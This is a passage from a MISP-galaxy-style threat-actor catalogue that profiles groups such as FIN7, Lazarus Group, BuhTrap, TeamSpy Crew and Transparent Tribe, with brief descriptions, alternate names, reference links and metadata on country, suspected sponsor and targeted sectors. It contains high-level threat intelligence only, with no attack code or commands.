- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://dragos.com/adversaries.html - webarchive
- http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks - webarchive
- https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt - webarchive
- https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine - webarchive
- https://www.welivesecurity.com/2017/05/23/xdata-ransomware-making-rounds-amid-global-wannacryptor-scare - webarchive
- https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine - webarchive
- https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine - webarchive
- https://cert.gov.ua/article/405538 - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
- https://packetstormsecurity.com/news/view/35790/Recent-OT-And-Espionage-Attacks-Linked-To-Russias-Sandworm-Now-Named-APT44.html - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/apt44-unearthing-sandworm?linkId=9627235 - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Russia', 'Lithuania', 'Kyrgyzstan', 'Israel', 'Ukraine', 'Belarus', 'Kazakhstan', 'Georgia', 'Poland', 'Azerbaijan', 'Iran'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Electric', 'Energy', 'Industrial'] |
FIN7
Groups targeting financial organizations or people with significant financial assets.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN7.
Known Synonyms |
---|
ATK32 |
CARBON SPIDER |
Calcium |
Carbanak |
Carbon Spider |
Coreid |
ELBRUS |
G0008 |
G0046 |
GOLD NIAGARA |
Sangria Tempest |
Internal MISP references
UUID 00220228-a5a4-4032-a30d-826bb55aa3fb
which can be used as unique global reference for FIN7
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/Carbanak - webarchive
- https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe - webarchive
- http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf - webarchive
- https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
- https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor - webarchive
- https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - webarchive
- https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/ - webarchive
- https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain - webarchive
- https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf - webarchive
- https://www.group-ib.com/resources/threat-research/Anunak_APT_against_financial_institutions.pdf - webarchive
- https://attack.mitre.org/groups/G0008/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html - webarchive
- https://threatpost.com/fileless-malware-campaigns-tied-to-same-attacker/124369/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - webarchive
- https://blog.morphisec.com/fin7-attacks-restaurant-industry - webarchive
- https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/ - webarchive
- https://blog.morphisec.com/fin7-attack-modifications-revealed - webarchive
- https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign - webarchive
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://attack.mitre.org/groups/G0046/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://threatintel.blog/OPBlueRaven-Part1/ - webarchive
- https://threatintel.blog/OPBlueRaven-Part2/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
motive | Cybercrime |
TeamSpy Crew
Researchers have uncovered a long-term cyber-espionage campaign that used a combination of legitimate software packages and commodity malware tools to target a variety of heavy industry, government intelligence agencies and political activists. Known as the TeamSpy crew because of its affinity for using the legitimate TeamViewer application as part of its toolset, the attackers may have been active for as long as 10 years, researchers say. The attack appears to be a years-long espionage campaign, but experts who have analyzed the victim profile, malware components and command-and-control infrastructure say that it’s not entirely clear what kind of data the attackers are going after. What is clear, though, is that the attackers have been at this for a long time and that they have specific people in mind as targets. Researchers at the CrySyS Lab in Hungary were alerted by the Hungarian National Security Authority to an attack against a high-profile target in the country and began looking into the campaign. They quickly discovered that some of the infrastructure being used in the attack had been in use for some time and that the target they were investigating was by no means the only one.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamSpy Crew.
Known Synonyms |
---|
Anger Bear |
IRON LYRIC |
Team Bear |
TeamSpy |
Internal MISP references
UUID 82c1c7fa-c67b-4be6-9be8-8aa400ef2445
which can be used as unique global reference for TeamSpy Crew
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/team-spy-crew - webarchive
- https://threatpost.com/researchers-uncover-teamspy-attack-campaign-targeting-government-research-targets-032013/77646/ - webarchive
- https://www.crysys.hu/publications/files/teamspy.pdf - webarchive
- https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20134928/theteamspystory_final_t2.pdf - webarchive
- https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Hungary', 'Belarus'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Activists', 'Intelligence', 'Government, Administration'] |
BuhTrap
Buhtrap has been active since 2014; however, its first attacks against financial institutions were only detected in August 2015. Earlier, the group had focused solely on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks. From August 2015 to February 2016, Buhtrap managed to conduct 13 successful attacks against Russian banks for a total amount of 1.8 billion rubles ($25.7 mln). The number of successful attacks against Ukrainian banks has not been identified. Buhtrap is the first hacker group to use a network worm to infect the entire bank infrastructure, which significantly increases the difficulty of removing all malicious functions from the network. As a result, banks have to shut down the whole infrastructure, which causes delays in servicing customers and additional losses. The malicious programs intentionally scan for machines running the automated Bank-Customer system of the Central Bank of Russia (further referred to as BCS CBR). We have not identified incidents of attacks involving online money transfer systems, ATM machines or payment gateways, which are known to be of interest to other criminal groups.
Internal MISP references
UUID b737c51f-b579-49d5-a907-743b2e6d03cb
which can be used as unique global reference for BuhTrap
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2015/11/11/operation-buhtrap-malware-distributed-via-ammyy-com/ - webarchive
- https://www.group-ib.com/brochures/gib-buhtrap-report.pdf - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.forcepoint.com/blog/security-labs/highly-evasive-code-injection-awaits-user-interaction-delivering-malware - webarchive
- https://www.kaspersky.com/blog/financial-trojans-2019/25690/ - webarchive
- https://www.welivesecurity.com/2015/04/09/operation-buhtrap/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Bank', 'Payment', 'Finance'] |
WOLF SPIDER
FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WOLF SPIDER.
Known Synonyms |
---|
FIN4 |
G0085 |
Internal MISP references
UUID ff449346-aa9f-45f6-b482-71e886a5cf57
which can be used as unique global reference for WOLF SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623 - webarchive
- https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf - webarchive
- https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html - webarchive
- https://attack.mitre.org/groups/G0085/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RO |
targeted-sector | ['Health', 'Finance', 'Pharmacy'] |
Boulder Bear
First observed activity in December 2013.
Internal MISP references
UUID 85b40169-3d1c-491b-9fbf-877ed57f32e0
which can be used as unique global reference for Boulder Bear
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
SHARK SPIDER
This group's activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.
Internal MISP references
UUID 7dd7a8df-9012-4d14-977f-b3f9f71266b4
which can be used as unique global reference for SHARK SPIDER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Bank'] |
UNION SPIDER
Adversary targeting manufacturing and industrial organizations.
Internal MISP references
UUID db774b7d-a0ee-4375-b24e-fd278f5ab2fd
which can be used as unique global reference for UNION SPIDER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Manufacturing', 'Industrial'] |
Silent Chollima
Andariel is a threat actor that primarily targets South Korean corporations and institutions. They are believed to collaborate with or operate as a subsidiary organization of the Lazarus threat group. The group (also tracked as WHOis Team) utilizes spear phishing attacks, watering hole attacks, and supply chain attacks for initial access. They have been known to exploit vulnerabilities and use malware such as Infostealer and TigerRAT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silent Chollima.
Known Synonyms |
---|
Andariel |
GOP |
Guardian of Peace |
Onyx Sleet |
OperationTroy |
PLUTONIUM |
Subgroup: Andariel |
WHOis Team |
Internal MISP references
UUID 245c8dde-ed42-4c49-b48b-634e3e21bdd7
which can be used as unique global reference for Silent Chollima
in MISP communities and other software using the MISP galaxy
External references
- https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | KP |
Lazarus Group
Since 2009, HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims; some intrusions have resulted in the exfiltration of data while others have been disruptive in nature. Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace. Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Variants of malware and tools used by HIDDEN COBRA actors include Destover, Duuzer, and Hangman.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lazarus Group.
Known Synonyms |
---|
APT 38 |
APT-C-26 |
APT38 |
ATK117 |
ATK3 |
Andariel |
Appleworm |
BeagleBoyz |
Bluenoroff |
Bureau 121 |
COPERNICIUM |
COVELLITE |
Citrine Sleet |
DEV-0139 |
DEV-1222 |
Dark Seoul |
Diamond Sleet |
G0032 |
G0082 |
Group 77 |
Hastati Group |
Hidden Cobra |
Labyrinth Chollima |
Lazarus group |
NICKEL GLADSTONE |
NewRomanic Cyber Army Team |
Nickel Academy |
Operation AppleJeus |
Operation DarkSeoul |
Operation GhostSecret |
Operation Troy |
Sapphire Sleet |
Stardust Chollima |
Subgroup: Bluenoroff |
TA404 |
Unit 121 |
Whois Hacking Team |
ZINC |
Zinc |
Internal MISP references
UUID 68391641-859f-4a9a-9a1e-3e5cf71ec376
which can be used as unique global reference for Lazarus Group
in MISP communities and other software using the MISP galaxy
External references
- https://threatpost.com/operation-blockbuster-coalition-ties-destructive-attacks-to-lazarus-group/116422/ - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-164A - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-318A - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-318B - webarchive
- https://securelist.com/operation-applejeus/87553/ - webarchive
- https://securelist.com/lazarus-under-the-hood/77908/ - webarchive
- https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/lazarus-group - webarchive
- https://www.cfr.org/interactive/cyber-operations/operation-ghostsecret - webarchive
- https://www.cfr.org/interactive/cyber-operations/compromise-cryptocurrency-exchanges-south-korea - webarchive
- https://www.bleepingcomputer.com/news/security/lazarus-group-deploys-its-first-mac-malware-in-cryptocurrency-exchange-hack/ - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/03/the-advanced-persistent-threat-files-lazarus-group/ - webarchive
- https://www.theguardian.com/world/2009/jul/08/south-korea-cyber-attack - webarchive
- https://web.archive.org/web/20131123012339/https://www.symantec.com/connect/blogs/trojankoredos-comes-unwelcomed-surprise - webarchive
- https://www.nytimes.com/2013/03/21/world/asia/south-korea-computer-network-crashes.html - webarchive
- https://web.archive.org/web/20130607233212/https://www.symantec.com/connect/blogs/south-korean-financial-companies-targeted-castov - webarchive
- https://web.archive.org/web/20130701021735/https://www.symantec.com/connect/blogs/four-years-darkseoul-cyberattacks-against-south-korea-continue-anniversary-korean-war - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/the-hack-of-sony-pictures-what-you-need-to-know - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/ - webarchive
- https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/ - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/AR19-129A - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/ - webarchive
- https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/ - webarchive
- https://www.theregister.co.uk/2019/04/10/lazarus_group_malware/ - webarchive
- https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf - webarchive
- https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/a-look-into-the-lazarus-groups-operations - webarchive
- https://www.kaspersky.com/about/press-releases/2017_chasing-lazarus-a-hunt-for-the-infamous-hackers-to-prevent-large-bank-robberies - webarchive
- https://medium.com/threat-intel/lazarus-attacks-wannacry-5fdeddee476c - webarchive
- https://attack.mitre.org/groups/G0032/ - webarchive
- https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/ - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.bankinfosecurity.com/vietnamese-bank-blocks-1-million-online-heist-a-9105 - webarchive
- https://www.reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD - webarchive
- https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/what-we-can-learn-from-the-bangladesh-central-bank-cyber-heist/ - webarchive
- https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware - webarchive
- https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html - webarchive
- https://www.bloomberg.com/news/articles/2018-05-29/mexico-foiled-a-110-million-bank-heist-then-kept-it-a-secret - webarchive
- https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/ - webarchive
- https://www.darkreading.com/attacks-breaches/north-korean-hacking-group-steals-$135-million-from-indian-bank-/d/d-id/1332678 - webarchive
- https://www.zdnet.com/article/north-korean-hackers-infiltrate-chiles-atm-network-after-skype-job-interview/ - webarchive
- https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-gladstone - webarchive
- https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html - webarchive
- https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/ - webarchive
- https://dragos.com/adversaries.html - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/covellite - webarchive
- https://www.hvs-consulting.de/lazarus-report/ - webarchive
- https://github.com/hvs-consulting/ioc_signatures/tree/main/Lazarus_APT37 - webarchive
- https://blogs.jpcert.or.jp/en/2021/01/Lazarus_tools.html - webarchive
- https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html - webarchive
- https://attack.mitre.org/groups/G0082 - webarchive
- https://attack.mitre.org/groups/G0032 - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://www.securonix.com/blog/securonix-threat-labs-monthly-intelligence-insights-june-2023/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-048a - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Democratic People's Republic of) |
cfr-suspected-victims | ['South Korea', 'Bangladesh Bank', 'Sony Pictures Entertainment', 'United States', 'Thailand', 'France', 'China', 'Hong Kong', 'United Kingdom', 'Guatemala', 'Canada', 'Bangladesh', 'Japan', 'India', 'Germany', 'Brazil', 'Thailand', 'Australia', 'Cryptocurrency exchanges in South Korea'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | ['Espionage', 'Sabotage'] |
country | KP |
VICEROY TIGER
VICEROY TIGER is an adversary with a nexus to India that has historically targeted entities throughout multiple sectors. Older activity targeted multiple sectors and countries; however, since 2015 this adversary appears to focus on entities in Pakistan, with a particular focus on government and security organizations. This adversary consistently leverages spear phishing emails containing malicious Microsoft Office documents, malware designed to target the Android mobile platform, and phishing activity designed to harvest user credentials. In March 2017, the 360 Chasing Team found a sample of targeted attacks belonging to a previously unknown APT, whose activity the team can now trace back to at least April 2016. The Chasing Team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered new attack activity by the organization, confirmed and exposed the group's targeted attacks against Pakistan, and analyzed in detail the unique EHDevel malicious code framework used by the organization.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VICEROY TIGER.
Known Synonyms |
---|
APT-C-35 |
Donot Team |
OPERATION HANGOVER |
Orange Kala |
SectorE02 |
Internal MISP references
UUID e2b87f81-a6a1-4524-b03f-193c3191d239
which can be used as unique global reference for VICEROY TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://github.com/jack8daniels2/threat-INTel/blob/master/2013/Unveiling-an-Indian-Cyberattack-Infrastructure-appendixes.pdf - webarchive
- https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/ - webarchive
- https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia - webarchive
- https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/ - webarchive
- https://www.crowdstrike.com/blog/viceroy-tiger-delivers-new-zero-day-exploit/index.html - webarchive
- https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/ - webarchive
- https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://blog.cyble.com/2021/07/22/donot-apt-group-delivers-a-spyware-variant-of-chat-app/ - webarchive
- https://adversary.crowdstrike.com/en-US/adversary/viceroy-tiger - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-victims | ['Germany'] |
country | IN |
targeted-sector | ['Government, Administration', 'Security Service'] |
PIZZO SPIDER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PIZZO SPIDER.
Known Synonyms |
---|
Ambiorx |
DD4BC |
Internal MISP references
UUID dd9806a9-a600-48f8-81fb-07f0f1b7690d
which can be used as unique global reference for PIZZO SPIDER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | US |
Corsair Jackal
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Corsair Jackal.
Known Synonyms |
---|
TunisianCyberArmy |
Internal MISP references
UUID 59d63dd6-f46f-4334-ad15-30d2e1ee0623
which can be used as unique global reference for Corsair Jackal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TN |
SNOWGLOBE
In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SNOWGLOBE.
Known Synonyms |
---|
ATK8 |
Animal Farm |
Snowglobe |
Internal MISP references
UUID 3b8e7462-c83f-4e7d-9511-2fe430d80aab
which can be used as unique global reference for SNOWGLOBE
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/69114/animals-in-the-apt-farm/ - webarchive
- https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france - webarchive
- https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/ - webarchive
- https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/ - webarchive
- https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope - webarchive
- https://www.cfr.org/interactive/cyber-operations/snowglobe - webarchive
- https://resources.infosecinstitute.com/animal-farm-apt-and-the-shadow-of-france-intelligence/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | France |
cfr-suspected-victims | ['Syria', 'United States', 'Netherlands', 'Russia', 'Spain', 'Iran', 'China', 'Germany', 'Algeria', 'Norway', 'Malaysia', 'Turkey', 'United Kingdom', 'Ivory Coast', 'Greece'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | FR |
Deadeye Jackal
The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011, the SEA made Syria the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies. The precise nature of the SEA's relationship with the Syrian government has changed over time and is unclear.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Deadeye Jackal.
Known Synonyms |
---|
SEA |
SyrianElectronicArmy |
Internal MISP references
UUID 4265d44e-8372-4ed0-b428-b331a5443d7d
which can be used as unique global reference for Deadeye Jackal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | SY |
targeted-sector | ['Country', 'Defense', 'Opposition', 'Political party', 'News - Media', 'Government, Administration'] |
Operation C-Major
Group targeting Indian Army or related assets in India, as well as activists and civil society in Pakistan. Attribution to a Pakistani connection has been made by TrendMicro and others.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Operation C-Major.
Known Synonyms |
---|
APT 36 |
APT36 |
C-Major |
COPPER FIELDSTONE |
Earth Karkaddan |
Green Havildar |
Mythic Leopard |
ProjectM |
TMP.Lapis |
Transparent Tribe |
Internal MISP references
UUID acbb5cad-ffe7-4b0e-a57a-2dbc916e8905
which can be used as unique global reference for Operation C-Major
in MISP communities and other software using the MISP galaxy
External references
- http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf - webarchive
- https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf - webarchive
- https://www.amnesty.org/en/documents/asa33/8366/2018/en/ - webarchive
- https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe - webarchive
- https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf - webarchive
- https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf - webarchive
- https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials - webarchive
- https://s.tencent.com/research/report/669.html - webarchive
- https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html - webarchive
- https://www.secureworks.com/research/threat-profiles/copper-fieldstone - webarchive
- https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html - webarchive
- https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Pakistan |
cfr-target-category | ['Civil society', 'Military', 'Government'] |
country | PK |
targeted-sector | ['Activists', 'Civil society', 'Military'] |
Related clusters
Stealth Falcon
This threat actor targets civil society groups and Emirati journalists, activists, and dissidents.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Stealth Falcon.
Known Synonyms |
---|
FruityArmor |
G0038 |
Internal MISP references
UUID dab75e38-6969-4e78-9304-dc269c3cbcf0
which can be used as unique global reference for Stealth Falcon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United Arab Emirates |
cfr-suspected-victims | ['United Arab Emirates', 'United Kingdom'] |
cfr-target-category | ['Civil society'] |
cfr-type-of-incident | Espionage |
country | AE |
